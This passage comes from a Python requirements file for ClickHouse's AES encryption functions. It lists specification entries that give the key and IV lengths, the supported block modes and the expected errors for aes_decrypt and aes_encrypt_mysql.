'[ClickHouse] SHALL support `aad` with `String` or `FixedString` data types as the optional fifth\n'
'parameter to the `aes_decrypt` function that SHALL specify the additional authenticated data\n'
'for block modes that require it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the decrypted value of the data\n'
'using `String` data type as the result of `aes_decrypt` function.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_Key_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.Key.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is not exact for the `aes_decrypt` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_InitializationVector_Length_InvalidLengthError = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.InitializationVector.Length.InvalidLengthError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is speficified and the length is not exact for the `aes_decrypt` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_decrypt` function\n'
'for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AdditionalAuthenticationData_NotValidForMode = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AdditionalAuthenticationData.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `aad` is specified for the `aes_decrypt` function\n'
'for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AdditionalAuthenticationData_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AdditionalAuthenticationData.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL not limit the size of the `aad` parameter passed to the `aes_decrypt` function.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-ecb` and `key` is not 16 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-ecb` and `key` is not 24 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-ecb` and `key` is not 32 bytes\n'
'or `iv` or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cbc` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cbc` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cbc` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cfb1` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cfb1` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cfb1` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cfb8` and `key` is not 16 bytes\n'
'and if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cfb8` and `key` is not 24 bytes\n'
'or `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cfb8` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-cfb128` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-cfb128` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-cfb128` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-ofb` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-ofb` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-ofb` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes or `aad` is specified.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-gcm` and `key` is not 16 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-gcm` and `key` is not 24 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_GCM_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-GCM.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-gcm` and `key` is not 32 bytes\n'
'or `iv` is not specified or is less than 8 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_128_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-128-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-128-ctr` and `key` is not 16 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_192_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-192-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-192-ctr` and `key` is not 24 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_Decrypt_Function_AES_256_CTR_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.Decrypt.Function.AES-256-CTR.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt` function is set to `aes-256-ctr` and `key` is not 32 bytes\n'
'or if specified `iv` is not 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes_encrypt_mysql` function to encrypt data using [AES].\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Syntax = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Syntax',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support the following syntax for the `aes_encrypt_mysql` function\n'
'\n'
'```sql\n'
'aes_encrypt_mysql(plaintext, key, mode, [iv])\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_PlainText = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.PlainText',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `plaintext` accepting any data type as\n'
'the first parameter to the `aes_encrypt_mysql` function that SHALL specify the data to be encrypted.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Key = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
'as the second parameter to the `aes_encrypt_mysql` function that SHALL specify the encryption key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
'to the `aes_encrypt_mysql` function that SHALL specify encryption key length and block encryption mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.ValuesFormat',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
'of the `aes_encrypt_mysql` function where\n'
'the `key_length` SHALL specifies the length of the key and SHALL accept\n'
'`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB]. For example, `aes-256-ofb`.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.Invalid',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_encrypt_mysql`\n'
'function is not valid with the exception where such a mode is supported by the underlying\n'
'[OpenSSL] implementation.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_encrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-128-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-192-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-256-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_128_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-128-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-128-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_192_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-192-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-192-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_Mode_Value_AES_256_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.Mode.Value.AES-256-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-256-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_encrypt_mysql` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the encrypted value of the data\n'
'using `String` data type as the result of `aes_encrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Key_Length_TooShortError = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Key.Length.TooShortError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is less than the minimum for the `aes_encrypt_mysql`\n'
'function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_Key_Length_TooLong = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.Key.Length.TooLong',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL use folding algorithm specified below if the `key` length is longer than required\n'
'for the `aes_encrypt_mysql` function for a given block mode.\n'
'\n'
'```python\n'
'def fold_key(key, cipher_key_size):\n'
' key = list(key) if not isinstance(key, (list, tuple)) else key\n'
'\t folded_key = key[:cipher_key_size]\n'
'\t for i in range(cipher_key_size, len(key)):\n'
'\t\t print(i % cipher_key_size, i)\n'
'\t\t folded_key[i % cipher_key_size] ^= key[i]\n'
'\t return folded_key\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_InitializationVector_Length_TooShortError = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.InitializationVector.Length.TooShortError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` length is specified and is less than the minimum\n'
'that is required for the `aes_encrypt_mysql` function for a given block mode.\n'
